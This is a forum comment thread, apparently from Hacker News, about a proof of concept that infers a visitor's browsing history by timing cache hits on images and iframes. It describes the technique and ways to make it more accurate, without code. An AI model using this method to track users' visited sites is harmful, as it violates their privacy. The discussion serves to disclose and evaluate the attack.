It works. It works enough of the time and on enough browsers to be very relevant to anyone who cares about the privacy/security of internet users at large.
This is an impressive proof of concept, and an important thing to be discussing, yeah?
[EDIT] To clarify, I tested this on Firefox 8.0.1 on my 2011 iMac with Lion and it worked flawlessly one by one as I visited the sites "Facebook, Reddit, Flickr", they turned from gray to green in each subsequent test.
It did correctly detect some sites for me, but it gave one false positive and three false negatives. With that kind of error rate I just don't see it being taken seriously in anything that matters.
To test if a user has recently visited Facebook, see how long it takes for the Facebook logo to load when called from your own page. If it's relatively fast, you can assume the image has been cached by the user's browser ... meaning the user has recently visited Facebook. If it's relatively slow, you can assume no cached version of the logo is available, so the user probably hasn't visited Facebook recently.
Results are fuzzy because "relatively fast" and "relatively slow" are not precise.
Instead, I time <iframe>s, which allows SOP violations to be trapped the moment the browser barely starts thinking about rendering the target page. The other benefit is that <iframe> requests can be aborted quite easily when they are taking long enough for us to suspect cache miss - before the request is completed and cached.
The results should not be fuzzy, although the PoC uses hardcoded timings instead of doing calibration, which makes it a bit tricky with "outlier" clients (very fast or very slow).
I made some minor tweaks today, and the success rate should be greatly improved; there's now a mini-survey on the page, looks like ~90% of the people who bother to complete it are getting accurate results.
Better yet, do this for each target URL. Knowing the time that a miss takes vs. a hit will greatly increase your accuracy.
Also, does this work for Google+ (I don't have an account)? I'd be surprised if it did, since it uses X-Frame-Options.
Obviously, this didn't work against me.
Nice PoC though, and thanks for the lack of press release ;)
Edit: I just tried this out and it appears that the looping JS blocks the iframe from loading. I would have figured the iframe would be a separate JS thread. I'm wondering -- do all iframes share the same JS thread? Can one iframe block another? Anyway, it's clear that some sort of asynchronous solution is necessary.
Plus, if you do setInterval(..., 1) and then measure new Date().getTime() deltas, you will probably see that even if the browser isn't doing anything taxing, you get 100 ms or more every now and then...
Blogger - admin
Google search (UK)
If this is based on actual info taken from :visited selectors, apparently they are useless (maybe these are reported because of banners or scripts loaded from those sites or something?) and one could do a better job by just faking it.
It's not, it's based on trying to load some URL from the website and measuring the time it takes. If you went there, it should be on the cache and take much less time to load.
It doesn't seem to work that well, though.
Nope, that security hole was patched already. https://blog.mozilla.com/security/2010/03/31/plugging-the-cs...
The one good thing that could come out of this is that websites with the gianto bar of "follow me/like me" icons could be different sized based on if you detect that the user has went to certain social media site.
The summary of the paper makes me sad -
> We are not aware of any practical countermeasures to these attacks. There seems to be little hope that effective countermeasures will be developed and deployed any time soon.
I'm more surprised that it thinks that I've logged into blogger (which I've never done on this computer) than that it misses my one-page visit to reddit about a week ago. And on the next round the results are reversed.
It worked for me on Chrome. The one linked now gives some weird entries.
The idea is interesting but, considering that the performance of the client (-box) can affect the results, it doesn't feel very viable.
What about DNS cache probing? Is it possible? I guess it will suffer from similar results but at smaller scale.
This is on Firefox 8.0 on Fedora Linux. Maybe the OS has a lot to do with the success rate?
Edit: I just read through the technique now and there's no way it could depend on the OS. Anyway, this is way too inaccurate to be of any practical use.